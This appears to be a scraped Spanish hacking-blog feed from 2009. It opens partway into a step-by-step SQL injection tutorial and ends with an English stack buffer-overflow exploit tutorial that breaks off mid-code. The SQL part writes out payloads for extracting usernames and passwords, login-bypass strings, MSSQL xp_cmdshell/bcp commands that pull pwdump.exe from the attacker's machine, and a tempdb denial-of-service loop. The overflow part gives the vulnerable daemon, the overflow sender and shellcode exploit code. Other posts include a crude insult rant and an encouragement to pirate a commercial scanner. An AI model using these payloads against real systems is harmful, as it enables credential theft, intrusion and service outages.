bueno aqui lo que paso fue lo siguiente es que se supone que se muestre el articulo 10 solo se mostrara si 1 es igual que 0, en este caso "AND" significa que para que el articulo 10 se muestre en el sitio debe existir (en la base de datos) "AND" 1 debe ser igual que 0, esto ocacionara que no se muestre el articulo ya que 1 no es igual que 0 .

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10+AND+1=1-- ]

se muestra el articulo 10 si el 1 es igual que el 1 .,el articulo se mostrara en la pagina ya que "AND" 1 es igual que 1 .,Ahoea sabemos que la aplicacion es vulnerable ya que se muestra cuando queremos y no lo haces cuando queremos xD., es hora de continuar con nuestro ataque ;-)
Ahora queremos encontrar las columnas de nuestro sitio:

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10+ORDER+BY+1-- ]

"ORDER BY 1" donde esta "1" es el numero de la columna lo que hace es mostrarnos la primera columna en la pagina.,"ORDER BY 2" nos mostrara la 2 columna en la pagina., sucesivamente vamos aunmentando los valores del numero sumandole (+) uno hasta que nos muestre un error en la pagina y entonces cuando nos muestra el error la restamos uno de los numeros que pusimos y no te olvides de ese numero por ejemplo si sumastes numeros y te dio el error cuando pusistes hasta 6 entonces seria asi:

--> [ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=10+ORDER+BY+5-- ]

bueno ya sabemos que tiene 5 columnas la aplicacion., ahora queremos conseguir el nombre de las tablas que ya arriba habiamos mencionado este comando pues eso lo haremos de esta manera:

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,4,5+FROM+INFORMATION_SCHEMA.TABLES-- ]

OK expliquemos esa sentencia SELECT Le indica al sitio que muestre la informacion de la tabla que usted especifica.,en este caso acabamos remplazando el numero del articulo que era 69 por un caracter negativo "-".,recordemos tambien que en pasos anteriores para buscar la columna ibamos sumandole numeros y agregandolos a la url pues en este caso los vamos poniendo uno al lado del otro separados de una coma "," (1,2,3,4,5).

Se supone que a estas alturas uno de esos numeros que pusistes en la consulta de la URL al menos uno se muestre en el website (pantalla).

ahora lo que iremos es remplazando los numeros en la URL por palabras si se van mostrando en la pantalla..

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,nombre_tabla,5+FROM+INFORMATION_SCHEMA.TABLES-- ]

Recuerden que deben remplazar un al menos uno de los numeros con "nombre_tabla" que es el nombre de la tabla.,FROM+INFORMATION_SCHEMA.TABLES recuerden tambien que esto te mostrara el nombre de la tabla que ya eso lo explicamos arriba.,el nombre de la tabla numero 4 que fue la que remplazamos se mostrara en la pantalla.,...

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,nombre_tabla,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+nombre_tabla>'displayed_table'-- ]

Estamos seguros que "nombre_tabla" no es la que buscamos y la que queremos es la que tiene los usuarios y los passwords.,para navegar una lista de tablas y encontrar la tabla correcta agregamos:

[+WHERE+nombre_tabla>'displayed_table']

Displayed_table muestra la tabla incorrecta despues de TABLES por ende este comando displayed_table nos muestra la tabla siguiente despues de.,entonces lo que hacemos es que repetimos el paso anterior hasta que nos muestre una tabla deseada que en este caso la que queremos es la que contenga los usuarios.,ya cuando la consigas no olvides el nombre de la tabla que querias.,

Ahora queremos sacar nuestra columna o nombre de la columna:

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,nombre_columna,5+FROM+INFORMATION_S
CHEMA.COLUMNS+WHERE+nombre_tabla='CuentasUsuarios'-- ]

Entonces FROM+INFORMATION_SCHEMA.COLUMNS lo que hace es mostrarnos el nombre de las columnas en la tabla 'CuentasUsuarios'.,ahora en vez de mostrarse el nombre de la tabla se mostrara el nombre de la columna en la tabla 'CuentasUsuarios'..

como en pasos anteriores tenemos un blanco especifico y ahora en este caso buscar la columna especifica:

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,nombre_columna,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+nombre_tabla='CuentasUsuarios'+AND+nombre_columna>'displayed_column'-- ]

como reiteradamente mencione antes,queremos buscar la columna especifica de igual manera que hicimos para conseguir la tabla de usuarios antes.,si lo que queremos son los usuarios y passwords pues sabemos que debemos buscar las columnas que tengan nombres similares a usuarios,passwords,user,pass,logeo,acceso etc.

el comando anterior lo que hace es mostrar la columna que va siguiente a la mostrada que habiamos sacado previamente, y como ya mencione en el paso de sacar las tablas repetiremos los pasos hasta dar con la columna que queremos.

y ya dimos supuestamente con las columnas que queriamos que se llaman 'usuario' 'acceso' no olvidemos estas columnas tampoco,asumiendo que apuntaron los resultados para tener nuestra inyeccion final recordamos que los datos serian asi

##################################
#Nombre de Tabla Columnas#
##################################
#CuentasUsuarios usuario #
# acceso #
##################################

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,usuario,5+FROM+CuentasUsuarios-- ]

Este comando nos muestra la primera data de la columna "usuarios" de la tabla "CuentasUsuarios".

Digamos que la pagina nos mostro 'Cascanola' xD

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,acceso,3+FROM+CuentasUsuarios+WHERE+usuario='Cascanola'-- ]

Este comando nos mostrara el password del usuario 'Cascanola' que esta guardado en la tabla 'CuentasUsuarios'.,entonces en nuestra pagina se nos tiene que haber mostrado el password del usuario que en nuestro ataque imaginario es "12345678" xD...

entonces al final de nuestro ataque nos logueamos con el usuario 'Cascanola' y el password '12345678' xD Ewww...

recordemos que este escenario solo es suponiendo las paginas y las consultas se aplicaran con la pura logica del usuario..

ok podemos aplicar mas o menos los mismos metodos en otro tpo de base de datos no nesesariamente sql server, mssql de mocosoft xD, en fin las tecnicas mas o menos iguales aqui una rapida introduccion la misma web escenario pero en php..

[ www.webquenoesdelgobierno.com/index.php?id=0 ]

lo mismo que ya deben saber despues de "=" es nuestro articulo por ende la consulta a la base de dato y que si fuera el caso que fuera vulnerable nuestra aplicacion la inyeccion va a partir de "=".,

esta vez usamos de ejemplo un formulario de logeo y lo primero que usaremos el articulo siendo "=0" sera

[ ‘OR 1=1--]

ok ya tenemos claro muchas cosillas debido a la lectura hasta este momento xD usaremos ese comando en los campos de logeo osea donde dice usuario y password,usemos otro ejemplo pero directo a la URL:

[ www.webquenoesdelgobierno.com/index.php?id=0 ‘OR 1=1-- ]

usualmente este lo usamos cuando es una inyeccion a ciegas que meramente hablaremos de ella mas adelante por consecuente haz de haber investigado de mas comandos SQL para sacar info dentro de las base de datos podemos usar muchos otros strings u comandos.

admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
‘hi or 1=1--

hay muchas tecnicas abarcadas dentro del tema de las inyecciones sql de las que podemos poner muchicimas pero no quiero aburrirlos en el tema repetitivo y algo que quiero recrdarles que dentro de la base de datos no solamente podemos atacar con inyecciones SQL los Buffer Overflows que es un Ataque bien interesante y uno de los metodos favoritos de este servidor se pueden realizar dentro de ellas pero por ahora eso es en otro capitulo.

es bien impotante recordar que muchas veces nos enontramos con tal aplicacion y ni sabemos que tipo de base de datos gestiona pero eso lo iras mejorando durante el camino si aun asi no sabes como dar con ella puedes intentar con zenmap es una herramienta indispensable a la hora de hacer pentesting.

Ahora sigamos con el tema de las inyecciones en este caso las inyecciones a ciegas o como se conoce en ingles Blind SQL Injection.,ok explico que es esto usualmente cuando inyectamos una aplicacion y manipulamos la base de datos usualmente nos da los errores tipicos que nos indican si es vulnerable o no.,a raiz de esto los adminsitradores solo prohibe la muestra de errores en la programacion para que no sean mostradas en el sitio web para prevenir futuros ataques.

saben que administradores esto no los salva del todo xD igual si no muestra los errores puede ser vulnerable a inyeccion a ciegas ;-)

ok vamos a nuestro escenario imaginario para explicar mas sobre el asunto.digamos que nuestra webquenoesdelgobierno tiene una seccion que le da la oportunidad a sus empleados a ver los memos en linea de la empresa que son publicados blablabla la historia que ustedes quieran:

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 ]

entonces el comando que usara la web para buscar la data en la base de datos y mostrarse en la web sera este:

[ SELECT title, description,memoDate, body FROM memodats WHERE memodatID = 2 ]

y entonces el servidor respondera mostrando el 2 memo hecho por la empresa en forma de HTML para que pueda ser visualizado en dicha pagina (obviamente) y es lo que vemos con nuestros navegadores.

para probar si nuestra aplicacion es vulnerable traten de injectar un caracter mas despues del Parametro Comando WHERE y veamos que pasa?

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND 1=1 ]

por resultado el website realiza la siguiente consulta:

[ SELECT title, description, memoDate, body FROM memodats WHERE memodatID = 2 AND 1=1 ]

si por resultado la pagina se muestro con el 2 memo o sea la pagina normal que vistes al principio antes de hacer esa consulta pues tenemos una apliccion vulnerable a inyeccion SQL a ciegas.,si la aplicacion no fuera vulnerable pues simplemente la pagina no mostraba el memo o sea nuestra pagina por que el usuario hizo una mala consulta a la base de datos.

Cuanod probamos la aplicacion el Parametro WHERE es predecible 1=1 siempre sera nuestro inicio por ende real (exite) pero no siempre sabemos si es true entonce por que no le preguntamos a la base de datos directamente?:

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND USER_NAME() = 'dbo' ]

USER_NAME() s un parametro que te muestra el nombre del usuaro actual si el usuario actual es 'dbo' (el administrador) entonces el memo se mostrar (nuestra pagina) si no es asi no se mostrara tan sencillo como eso.

entonces podemos de muchas maneras seguir sacandole info a la aplicacion como nombre de la tabla un numero a la vez como la que ya aplicamos pero de otra manera:

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) > 109 ]

El Parametrdentro de la consulta 'SELECT' pregunta el nombre de la primera tabla del usuario de la base datos que obviamente siempre es lo primero que queremos haces a la hora de sql injection.,el parametro dentro de la consulta substring() esta funcion nos mostrara el primer caracter de nuestra consulta, el parametro lower() dentro de la consulta lo que hace es convertir ese caracter en letra minuscula, y finalmente el parametro ascii() dentro de la consulta lo que hace es mostrarnos ese caracter en ascii o sea el valor ascii, claro? XD ehh

si el servidor nos responde mostrando la pagina que normalmente estabamos visualizando o sea el memo pues sabemos que la primera letra de la consulta esta despues de m en ascii es valor 109,haciendo algunas consultas podemos dar con el valor exacto de la letra.

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) > 116 ]

si no se mostro nuestro memo (la pagina) pues el valor ascii es mayor que 109,pero menor que 116 la letra esta entre 'n' y 't'.

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) > 113 ]

otro falso(pagina no mostrada) pues debe estar entre '110' y '113'.

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) > 111 ]

falso nuevamente :O pues debe estar entre estas dos letras 'n' y 'o', entonces continuamos cambiando un poco la consulta:

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) = 111 ]

El servidor nos muestra nuestro memo (pagina) asi que es positivo nuestro nombre de tabla en este caso es 'o' asi como la primera tabla de ella,para sacar la segunda letra repetiremos el proceso pero cambiaremos el parametro de consulta en substring() que el parametro seria el numero que va despues de 'xtype='U'),.

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 2,1))) = 109 ]

Repitamos el proceso hasta que nos de la palabra completa el problema de las inyecciones SQL a ciegas (Blind) es que tienen que hacer Hartas peticiones para dar con su objetivo,algo que lo pueden arreglar mientras van puliendo sus tecnicas.

repasemos otra vez atras con lo fundamental y su ejercicio es aqui es imaginarse el escenario y analizar la estructura del codigo SQL para saber de que manera es vulnerable analizemos este codigo:

[SQLQuery = "SELECT Username FROM Users WHERE Username = '" &
strUsername & "' AND Password = '" & strPassword & "'"
strAuthCheck = GetQueryResult(SQLQuery)
If strAuthCheck = "" Then
boolAuthenticated = False
Else
boolAuthenticated = True
End If]

ahora ustedes ya deben saber que cuando nos encontramos con una forma de logeo y password este codigo o similar es lo que tenemos en la base de datos vulnerable,entonces cuando metes los datos de usuario la consulta verifica en las tablas si hay algunos datos que concuerden con la data que acabas de admitir. si la data es encontrada pues eso se guarda en la variable strAuthCheck indicando que el usuario debe ser autentificado,si se diera que el usuario que accedimos no concuerda con ninguna de la data de la base de datos entonces la variable strAuthCheck se queda vacia por que el usuario no puede ser autentificado.

si las variables strUsername y strPassword tienen algun caracter que usted quiere pues usteden pueden modificar la consulta SQL para que le devuelva el nombre que ustedes quieren,sin nesesidad de saber el password u/o el usuario.pero eso les quedo ya bien claro atraves de la lectura solo que lo enfatizo mas para que se hagan de una idea totalmente clara,pueden decir pero si ya explicastes eso arriba. no esta demas refrescar el cocote xD.

ok preparemos otro posible escenario pero esta vez en sql server y digamos que ya obtuvistes los datos que quieres,entonces quieres ganar priilegios dentro del servidor y subir archivos al mismo muchos de los puertos que se podrian utilizar el firewall los bloquea como lo son los puertos 137-139.,lo que haremos es subir un archivo binario en una tabla creada por ti mismo directo en la base de datos y luego saltandolo a los directorios del server. xD
una manera bien rara pero todavia funciona

entonces crearemos una tabla en el servidor:

[ create table TablaMaligna (data text) ]

Despues de haber creado la tabla subiremos nuestro binario a la mismisima tabla que hemos creado:

[ bulk insert TablaMaligna
from 'pwdump.exe'
with (codepage='RAW') ]

El binario podemos descargarlo de manera remota al servidor victima con el siguiente comando:

[ exec xp_cmdshell 'bcp "select * from TablaMaligna" queryout
pwdump.exe -c -Craw -ipnuestra -Rus -N3n3Bueno' ]

este comando va a suceder una conexion entrante a nuestra pc y escribiendo los comandos en el ejecutable que estamos recreando,en este escenario usaremos el protocolo por defecto asi como el puerto por defecto que puede ser que el firewall bloquee esa conexion entonces haremos:

[ exec xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo',
'N3n3Bueno','REG_SZ','DBMSSOCN,ipnuestra,80'
]

luego :

[ exec xp_cmdshell 'bcp "select * from TablaMaligna" queryout
pwdump.exe -c -Craw -go0ns -Rus -N3n3Bueno' ]

el primer comando SQL configurara una conexion remota interactiva en el puerto -80 hacia nuestra maquina mientras el segundo comando SQL se conectara con nuestra maquina a traves del puerto -80 para descargar nuestro archivo binario..

entonces se preguntaran por que tanto revolu y tanta cosa pero lo que queremos enfatizar con este paper es cubrir el tema por completo en cada una de las tecnicas usadas.antes de llegar a usar los scanners y cosas y algo que veo bien comun es la costumbre de usar el SSS :O si ese mismo scanners que te arroja un 80% de falsos positivos a sabiendas que a manos pueden hacer muchicimas cosas.

ahora iremos algo mas teorico sobre esta vulnerabilidad para acabar con este capitulo a la hora de buscar la vulnerabilidad de esa aplicacion debemos tener bien en claro que el cliente debe comunicarse con el servidor y cuales son nuestros objetivos dentro de la ejecucion de la inyeccion.

despues de obtener los privilegios o que ya tengamos claro que la aplicacion es vulnerable podemos hacer muchas cosas inclusive un ataque de denegacion de servicio:

[ create table #tmp (x varchar(8000))
exec('insert into #tmp select ''X''')
while 1=1 exec('insert into #tmp select * from #tmp' ]

si haciendo esa consulta y manipulando los comandos podemos crear una tabla y correra con un loop infinito insertando variables en la tabla :O., las tablas temporeras se guardan en el sistema temporero de la base de datos y eventualmente nuestra base de datos temporal crecera resultando en el consumo de todos los recursos,y por ende el sistema cae al no poder comunicarse con la base de datos.
#######################################

las tecnicas son muchicimas y podemos continuar ire agregando mas tecnicas dado que la necesidad que vayan por un paso a paso en estos tiempos es imprecindible. continuaremos con el proximo capitulo y espero que esta introduccion les haya gustado. por ahora terminamos aqui a pasar a lo proximo
========================================

###########
#Bryant Aria#
###########

BackTrack 4 Pre-Final Lanzada

noreply@blogger.com (H4x0r Security Group) — Fri, 19 Jun 2009 23:25:00 -0700

Todavia no es la version final ni nada por el estilo pero si hay un poco de avanze en el lanzamiento de la final.

El Gran Equipo de Remote Exploit a Anunciado El Lanzamiento de la Pre-Final De Este Maravilloso Sistema Operativo (Suite De Pentesting) ...Descrita como la mejor herramienta It en el mercAdo asi como lo mejor que puede tener un auditor de sistemas en sus manos sin nesesidad de agregar, o descargar aditivo si ya por si viene todo instalado.

Ya como anuncian los desarrolladores y como se hizo con la beta por favor reportes de bugs y comportamiento raro reportenlo ya que de esa manera se le da la mano a los desarrolladores a hacer los arreglos correspondientes para la version final.

para una lista de los cambios pueden descargar el PdF Aqui con un resumen de los arreglos y cambios de esta version Aqui .

Y para descargar la live cd pueden hacerlo desde Aqui, que es una Imagen .Iso DvD.

Los Sums De la Iso Pueden Encontrarlos Aqui Md5sum y sha256sum .

Por este medio Agradecer al Equipo De Remote-Exploit:
Max Moser
Mati Aharoni
Filip Waeytens
Joshua D. Abraham
y no puede faltar a un gran amigo
J. Martin Bos (pureh@te)

=====================================
gracias mi gente y esperemos a que salga la final mientras tanto prueben con esa...

salu2

Acunetix 6.5 Lanzado Scanner De Vulnerabilidades

noreply@blogger.com (H4x0r Security Group) — Fri, 19 Jun 2009 10:49:00 -0700

Ya saben que siempre tengo una guerra en contra de los scanners automatizados y mas aun en la plataforma de la mierda de Sistema Operativo Windows...pero cumplo al menos con dar la noticia.

y el Acunteix 6.5 fue lanzado supuestamente fueron arreglado y corregidos algunos bugs que tenia y se le hicieron una que otra mejora.

yo personalmente no lo e probado ni nada asi que realmente no puedo indicarles como es su performance en los servidores

tiene algunas cosas nuevas como recargar las paginas ey darle replay estilo live http headers o algo similar xD.

se le agregaron strings de sql injection para que todos los script kiddies que hay en la red se puedan divertir aun mas xD..asi como mas soporte para tomcat y otras aplicaciones webs realmente la interfaz no cambio practicamente es la misma que la pasada.

en fin mas herramientas para erradicar el elitismo de la la red o como dirian muchos enviandome mas mensajes

"es para hacer el trabajo mas facil,o para un auditor es una herramienta indispensable,los responsables de las auditorias IT saben que es lo mejor"

bla bla en fin pruebenla a ver lo mas lindo es el precio de la herramienta Aqui

pero nada que no se pueda conseguir por ahi como en warez bb o algo asi
salu2

Ak De Nuevo

noreply@blogger.com (H4x0r Security Group) — Fri, 24 Apr 2009 12:10:00 -0700

Bueno me estare dando la vuelta por aqui nuevamente ya que e estado muy ocupado recientemente con mi trabajo y mis funciones Mil.

gracias a los que se han preocupado por mi y han hechado sus bendiciones les agradezco de puro corazon.

a los "Haters" u Odiosos (que me odian) pues me pueden chupar mi gran verga,y conseguir una visa para que tengan 6 meses de ella xDDDDDDD lol sigan haciendo lo suyo que hago lo mio jajaja asi que ni se molesten y gasten energias en odiarme,me encantaria 2 minutos con cada uno de ellos que garantizadamente los OWNEO Facil.

y pues estare por aqui dandome la vueltita seguidamente les quiere...

blood_rec

" U Can Hate Me Now "
xDDDD

Remote Exploitation with C and Perl by Preddy [English]

noreply@blogger.com (H4x0r Security Group) — Thu, 19 Mar 2009 20:54:00 -0700

#RootShell Security Group#

Código:

-- Remote Exploitation with C and Perl by Preddy - RootShell Security Group

--[ Contents

1.1 - Goal
1.2 - Situation
1.3 - Vulnerable Daemon + Vulnerability analyses
1.4 - Payload/Code construction/analyses in C
1.5 - Payload/Code construction/analyses in Perl
1.6 - Conlusion
1.7 - Contact & Feedback

[1.1]--[ Goal

Hi, Preddy here , 17 year old turkish kid from holland,First of all sorry for my english , please do notify me of any spelling errors.
I would recommend you to read my previous tutorial about "Simple Buffer Overflows"
to avoid misunderstanding in this tutorial and to get a basic understanding of buffer overflows.
Our goal is to write two remote exploits , one in c and one in perl.
Both of the exploits, exploit a vulnerability in a small vulnerable daemon.
You would need perl installed(eg: ActivePerl for windows) and a compiler for c
(eg: cygwin for windows) you should have perl and a compiler package installed at your
linux distribution, you can install them with the following commands
(incase you haven't got it installed) :

To search for the perl package:

apt-cache search perl

then to install it:

apt-get install [perl-pkg-name]

you can do the same with the compiler package.

[1.2]--[ Situation

I have a laptop on my left side and a desktop on my right-hand side.
the laptop uses the following local ip address: 192.168.1.100
and the desktop uses: 192.168.1.101 as it's local ip address.
The laptop is the attacker in this situation and the desktop is our victim.
both run slackware 10.2 and have the VA patch turned off.

Turning the VA patch off:

cat /proc/sys/kernel/randomize_va_space
1
echo 0 > /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
0

The desktop computer runs a vulnerable daemon on port 7500 which we have to exploit
and open its cd-rom drive with the payload. Once again it's a very basic stack overflow
and this should be a piece of cake for the average exploit writer but it's very
usefull for people who are just starting to write exploits and exploit buffer overflows.

[1.3]--[ Vulnerable Daemon + Vulnerability analyses

Our vulnerable daemon:

server.c
---

#include
#include
#include
#include
#include
#include
#include

#define LISTENPORT 7500

#define BACKLOG 10

#define MSG "Hello, how are you?"

int handle_reply(char *str)
{

char response[256];

strcpy(response,str);

printf("The client says \"%s\"\n",response);

return 0;

}

int main(int argc, char * argv[]) {
int sock, conn;
struct sockaddr_in my_addr, client_addr;
int sockopt_on = 1;
int sa_in_size = sizeof(struct sockaddr_in);
char reply[1024];

//get a socket
if ((sock = socket(AF_INET, SOCK_STREAM,0)) == -1) {
perror("socket");
exit(1);
}

//first zero the struct
memset((char *) &my_addr, 0, sa_in_size);

//now fill in the fields we need
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(LISTENPORT);
my_addr.sin_addr.s_addr = htonl(INADDR_ANY);

//bind our socket to the port
if (bind(sock,(struct sockaddr *)&my_addr, sa_in_size) == -1) {
perror("bind");
exit(1);
}

//start listening for incoming connections
if (listen(sock,BACKLOG) == -1) {
perror("listen");
exit(1);
}

while(1) {
//grab connections
conn = accept(sock, (struct sockaddr *)&client_addr, &sa_in_size);
if (conn == -1) {
perror("accept");
exit(1);
}

//log the connecter
printf("got connection from %s\n", inet_ntoa(client_addr.sin_addr));

//send a greeting
send(conn,MSG,strlen(MSG)+1,0);

//get the reply
recv(conn, reply, 1024, 0);

handle_reply(reply);

}

return 0;
}
---

This piece of code serves as a daemon and waits for people to connect,
on a successfull connection the server replies with a message and
waits for the user to reply back with his message.
The message get's stored in a buffer called 'reply' which can hold
1024 bytes of data.

the vulnerability lies in the handle_reply() function let's analyze it:

handle_reply()
---

int handle_reply(char *str)
{

char response[256];

strcpy(response,str);

printf("The client says \"%s\"\n",response);

return 0;

}
---

as you can see it has a response buffer which can hold 256 bytes of data
the reply message from the user gets copied in that buffer and the response
message is viewed at the server.

like this,

client:
---

telnet 192.168.1.101 7500
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
Hello, how are you?fine thanks how are you?

---

server:
---

got connection from 192.168.1.100
The client says "fine thanks how are you?
"
---

as you can see nothing special happens. But let's try to send a buffer which
is 272 bytes , which exceeds the buffersize of the response buffer in the handle_reply()
function.

[1.4]--[ Payload/Code construction/analyses in C

We want to send a 272 byte buffer to port 7500 of our victim (192.168.1.101)
so let's start by writing a simple piece of c code which can send 272 x A (0x41) to port
7500. Also don't forget to enable coredumps to analyze the overflow,

Enabling coredumps:

ulimit -c unlimited

Our overflow code:

send_overflow.c
---

/*

-- Send overflow (C version) written by Preddy

Part of Preddy's Remote Exploitation with C and Perl tutorial

Usage: ./send_overflow

Example: ./send_overflow 192.168.1.101

*/

/*
include headers which are required for a network connection
and other functionalities in the program
*/

#include
#include
#include
#include
#include
#include
#include

/*
define our remote port and the data which we are going to send
*/

#define REMPORT 7500
#define A 0x41

//Start with the program
int main(int argc,char **argv)
{

/* declare our variables */
int conn; //our connection variable, which will connect to the remote computer
int fd; // our socket file descriptor

//assign struct sockadd_in to remaddr
struct sockaddr_in remaddr;

//declare our payload buffer which will hold 272 bytes of data
char payload[272];

/*
check if the first commandline argument is given (the ip address)
if NOT print a message and exit
*/

if(!argv[1])
{

printf("Specify ip plz..\n");

exit(1);

}

/*
create the socket and also check for errors at creation
if an error is detected socket() will return -1
*/
if((fd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{

perror("socket");

exit(1);

}

/*
this is going to overwrite the Extended Instruction Pointer
with 4 x 0x42 (BBBB -> 0x42 is also knows as B in its ascii form - http://www.lookuptables.com/)
*/

char *eip = "\x42\x42\x42\x42";

/*
fill our payload with 268 bytes of A (previously defined as 0x41)
*/

memset(payload,A,268);

/* fill the part after 268 bytes with our eip (BBBB - 0x42424242) */

memcpy(payload+268,eip,sizeof(eip));

/* connection information */
remaddr.sin_family = AF_INET; //domain
remaddr.sin_addr.s_addr = inet_addr(argv[1]); //remote connection address (our first argument - IP)
remaddr.sin_port = htons(REMPORT); //the remote port to connect to (previously defined as 7500)

/* this is where the actual connection take's place */

conn = connect(fd, (struct sockaddr_in *)&remaddr,sizeof(remaddr));

/* check the connection for errors as you know it returns -1 at errors */
if(conn < 0)
{

printf("Error: could not connect\n");
exit(1);
}

/* this is the part where our payload gets sent */

send(fd,payload,strlen(payload),0);

/* this is extra information which is displayed after sending the payload */

printf("Payload Size: %i\n",sizeof(payload));
printf("Payload Sent..\n");

}

---

Now we can start with compiling our program:

client:
---
gcc send_overflow.c -o send_overflow

./send_overflow 192.168.1.101
Payload Size: 272
Payload Sent..
---

server:
---

got connection from 192.168.1.100
The client says "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
Segmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x42424242 in ?? ()
(gdb) i r eip
eip 0x42424242 0x42424242
(gdb)

---

as you see we have overwritten the extended intruction pointer with our own
eip which we constructed before in our payload (char *eip = "\x42\x42\x42\x42";)
and its overwritten with exacly BBBB

so now we have to place our shellcode in our payload and also our nopsled.
and finish a huge part of the exploit.

server_exploit.c
---

/*

-- Remote "eject cd-rom" exploit (C version) written by Preddy

Part of Preddy's Remote Exploitation with C and Perl tutorial

Usage: ./server_exploit

Example: ./server_exploit 192.168.1.101

*/

/*
include headers which are required for a network connection
and other functionalities in the program
*/

#include
#include
#include
#include
#include
#include
#include

/*
define our remote port and the data which we are going to send
*/

#define REMPORT 7500
#define NOP 0x90
#define A 0x41

//Start with the program

int main(int argc,char **argv)
{

//Our shellcode which ejects the cd-rom drive..

/*
* (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
* - izik
*/

char scode[] =

"\x6a\x05" // push $0x5
"\x58" // pop %eax
"\x31\xc9" // xor %ecx,%ecx
"\x51" // push %ecx
"\xb5\x08" // mov $0x8,%ch
"\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
"\x68\x65\x76\x2f\x63" // push $0x632f7665
"\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80" // int $0x80
"\x89\xc3" // mov %eax,%ebx
"\xb0\x36" // mov $0x36,%al
"\x66\xb9\x09\x53" // mov $0x5309,%cx
"\xcd\x80" // int $0x80
"\x40" // inc %eax
"\xcd\x80"; // int $0x80

/* declare our variables */
int conn; //our connection variable, which will connect to the remote computer
int fd; // our socket file descriptor

//assign struct sockadd_in to remaddr
struct sockaddr_in remaddr;

//declare our payload buffer which will hold 272 bytes of data
char payload[272];

/*
check if the first commandline argument is given (the ip address)
if NOT print a message and exit
*/

if(!argv[1])
{

printf("Specify ip plz..\n");

exit(1);

}

/*
create the socket and also check for errors at creation
if an error is detected socket() will return -1
*/

if((fd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{

perror("socket");

exit(1);

}

/*
this is going to overwrite the Extended Instruction Pointer
with 4 x 0x42 (BBBB -> 0x42 is also knows as B in its ascii form - http://www.lookuptables.com/)
*/

char *eip = "\x42\x42\x42\x42";

/*

Shellcode size: 40 bytes

272 bytes used to overwrite eip with 0x42424242

eip = 4 bytes

272 -4 = 268
268 - 40 = 228
Nopsled = 228 bytes

*/

memset(payload,NOP,228); //construct the nopsled
memcpy(payload+228,scode,sizeof(scode)); //place our shellcode after the nopsled
memcpy(payload+268,eip,sizeof(eip)); //place eip after our shellcode

/*

structure:

[NOPSLED - 228 BYTES] + [SHELLCODE - 40 BYTES] + [EIP - 4 BYTES] = 272 BYTES

*/

/* connection information */
remaddr.sin_family = AF_INET; //domain
remaddr.sin_addr.s_addr = inet_addr(argv[1]); //remote connection address (our first argument - IP)
remaddr.sin_port = htons(REMPORT); //the remote port to connect to (previously defined as 7500)

/* this is where the actual connection take's place */

conn = connect(fd, (struct sockaddr_in *)&remaddr,sizeof(remaddr));

/* check the connection for errors as you know it returns -1 at errors */
if(conn < 0)
{

printf("Error: could not connect\n");
exit(1);
}

